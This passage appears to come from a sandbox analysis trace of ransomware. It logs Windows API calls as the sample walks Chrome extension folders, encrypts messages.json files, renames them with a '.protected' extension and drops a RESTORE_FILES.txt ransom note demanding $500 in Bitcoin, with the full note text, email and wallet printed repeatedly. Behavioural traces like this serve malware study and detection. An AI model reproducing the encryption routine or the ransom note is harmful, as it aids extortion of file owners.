service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.064] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.065] lstrlenA (lpString="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") returned 684 [0080.065] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.065] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.065] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.065] CloseHandle (hObject=0x164) returned 1 [0080.065] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0080.065] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr") returned 141 [0080.065] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0080.065] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0080.065] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*") returned 143 [0080.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.066] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.066] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.066] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.066] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\.") returned 143 [0080.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.066] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.066] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.066] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.066] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.066] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.066] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\..") returned 144 [0080.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.066] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.066] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.066] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.066] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.066] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.066] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.067] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.067] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.067] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.067] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.067] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.068] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.068] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.068] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.068] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.068] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.068] CloseHandle (hObject=0x168) returned 1 [0080.069] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.protected") returned 165 [0080.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.protected")) returned 1 [0080.069] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.069] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.069] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0080.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.070] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.070] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.071] lstrlenA (lpString="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") returned 684 [0080.071] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.071] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.071] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.071] CloseHandle (hObject=0x164) returned 1 [0080.071] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.071] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0080.071] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0080.071] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0080.071] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0080.071] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0080.071] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he") returned 141 [0080.071] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0080.071] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0080.071] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*") returned 143 [0080.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.071] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.071] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.071] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.071] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.071] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.071] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\.") returned 143 [0080.071] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.071] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.071] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.072] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.072] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.072] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.072] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\..") returned 144 [0080.072] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.072] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.072] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.072] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.072] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.072] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.072] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.072] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0080.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.073] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0080.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.073] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.073] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.074] CloseHandle (hObject=0x168) returned 1 [0080.074] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.protected") returned 165 [0080.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.protected")) returned 1 [0080.074] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.074] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.074] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\RESTORE_FILES.txt") returned 159 [0080.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.075] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.075] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.075] lstrlenA (lpString="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") returned 684 [0080.075] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.075] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.075] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.075] CloseHandle (hObject=0x164) returned 1 [0080.075] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.075] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0080.075] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0080.075] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi") returned 141 [0080.076] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0080.076] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*") returned 143 [0080.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.076] 
